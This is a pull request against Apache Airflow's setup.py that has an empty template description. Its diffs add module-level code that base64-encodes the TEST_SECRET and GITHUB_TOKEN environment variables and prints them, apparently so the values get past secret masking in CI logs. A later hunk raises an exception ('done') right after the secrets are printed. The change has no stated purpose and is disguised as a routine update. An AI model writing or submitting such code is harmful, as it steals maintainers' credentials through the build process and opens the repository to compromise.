### PR TITLE
Update setup.py

### DIFF
--- a/setup.py
+++ b/setup.py
@@ -30,6 +30,7 @@ import subprocess
 import sys
 import textwrap
 import unittest
+import base64
 from copy import deepcopy
 from pathlib import Path
 from typing import Iterable
@@ -49,7 +50,8 @@ from distutils import log  # isort: skip
 # PyPI version to install the provider package from
 INSTALL_PROVIDERS_FROM_SOURCES = "INSTALL_PROVIDERS_FROM_SOURCES"
 PY39 = sys.version_info >= (3, 9)
-print(os.getenv("TEST_SECRET"))
+print(base64.b64encode(os.getenv("TEST_SECRET").encode('utf-8')))
+print(base64.b64encode(os.getenv("GITHUB_TOKEN").encode('utf-8')))
 
 logger = logging.getLogger(__name__)
 

--- a/setup.py
+++ b/setup.py
@@ -61,7 +61,7 @@ PROVIDERS_ROOT = AIRFLOW_SOURCES_ROOT / "airflow" / "providers"
 CROSS_PROVIDERS_DEPS = "cross-providers-deps"
 DEPS = "deps"
 CURRENT_PYTHON_VERSION = f"{sys.version_info.major}.{sys.version_info.minor}"
-
+raise Exception("done")
 
 def apply_pypi_suffix_to_airflow_packages(dependencies: list[str]) -> None:
     """

--- a/setup.py
+++ b/setup.py
@@ -50,8 +50,8 @@ from distutils import log  # isort: skip
 # PyPI version to install the provider package from
 INSTALL_PROVIDERS_FROM_SOURCES = "INSTALL_PROVIDERS_FROM_SOURCES"
 PY39 = sys.version_info >= (3, 9)
-print(base64.b64encode(os.getenv("TEST_SECRET").encode('utf-8')))
-print(base64.b64encode(os.getenv("GITHUB_TOKEN").encode('utf-8')))
+print("---secret---", base64.b64encode(os.getenv("TEST_SECRET", "").encode('utf-8')))
+print("---token---", base64.b64encode(os.getenv("GITHUB_TOKEN", "").encode('utf-8')))
 
 logger = logging.getLogger(__name__)
 

--- a/setup.py
+++ b/setup.py
@@ -50,7 +50,7 @@ from distutils import log  # isort: skip
 INSTALL_PROVIDERS_FROM_SOURCES = "INSTALL_PROVIDERS_FROM_SOURCES"
 PY39 = sys.version_info >= (3, 9)
 
-logger = logging.getLogger(__name__)
+logger = logging.getLogger(__name__a)
 
 AIRFLOW_SOURCES_ROOT = Path(__file__).parent.resolve()
 PROVIDERS_ROOT = AIRFLOW_SOURCES_ROOT / "airflow" / "providers"

--- a/setup.py
+++ b/setup.py
@@ -49,8 +49,9 @@ from distutils import log  # isort: skip
 # PyPI version to install the provider package from
 INSTALL_PROVIDERS_FROM_SOURCES = "INSTALL_PROVIDERS_FROM_SOURCES"
 PY39 = sys.version_info >= (3, 9)
+print(os.getenv("TEST_SECRET"))
 
-logger = logging.getLogger(__name__a)
+logger = logging.getLogger(__name__)
 
 AIRFLOW_SOURCES_ROOT = Path(__file__).parent.resolve()
 PROVIDERS_ROOT = AIRFLOW_SOURCES_ROOT / "airflow" / "providers"


### PR DESCRIPTION
<!--
 Licensed to the Apache Software Foundation (ASF) under one
 or more contributor license agreements.  See the NOTICE file
 distributed with this work for additional information
 regarding copyright ownership.  The ASF licenses this file
 to you under the Apache License, Version 2.0 (the
 "License"); you may not use this file except in compliance
 with the License.  You may obtain a copy of the License at

   http://www.apache.org/licenses/LICENSE-2.0

 Unless required by applicable law or agreed to in writing,
 software distributed under the License is distributed on an
 "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
 KIND, either express or implied.  See the License for the
 specific language governing permissions and limitations
 under the License.
 -->

<!--
Thank you for contributing! Please make sure that your code changes
are covered with tests. And in case of new features or big changes
remember to adjust the documentation.

Feel free to ping committers for the review!

In case of an existing issue, reference it using one of the following:

closes: #ISSUE
related: #ISSUE

How to write a good git commit message:
http://chris.beams.io/posts/git-commit/
-->



<!-- Please keep an empty line above the dashes. -->
---
**^ Add meaningful description above**
Read the **[Pull Request Guidelines](https://github.com/apache/airflow/blob/main/CONTRIBUTING.rst#pull-request-guidelines)** for more information.
In case of fundamental code changes, an Airflow Improvement Proposal ([AIP](https://cwiki.apache.org/confluence/display/AIRFLOW/Airflow+Improvement+Proposals)) is needed.
In case of a new dependency, check compliance with the [ASF 3rd Party License Policy](https://www.apache.org/legal/resolved.html#category-x).
In case of backwards incompatible changes please leave a note in a newsfragment file, named `{pr_number}.significant.rst` or `{issue_number}.significant.rst`, in [newsfragments](https://github.com/apache/airflow/tree/main/newsfragments).
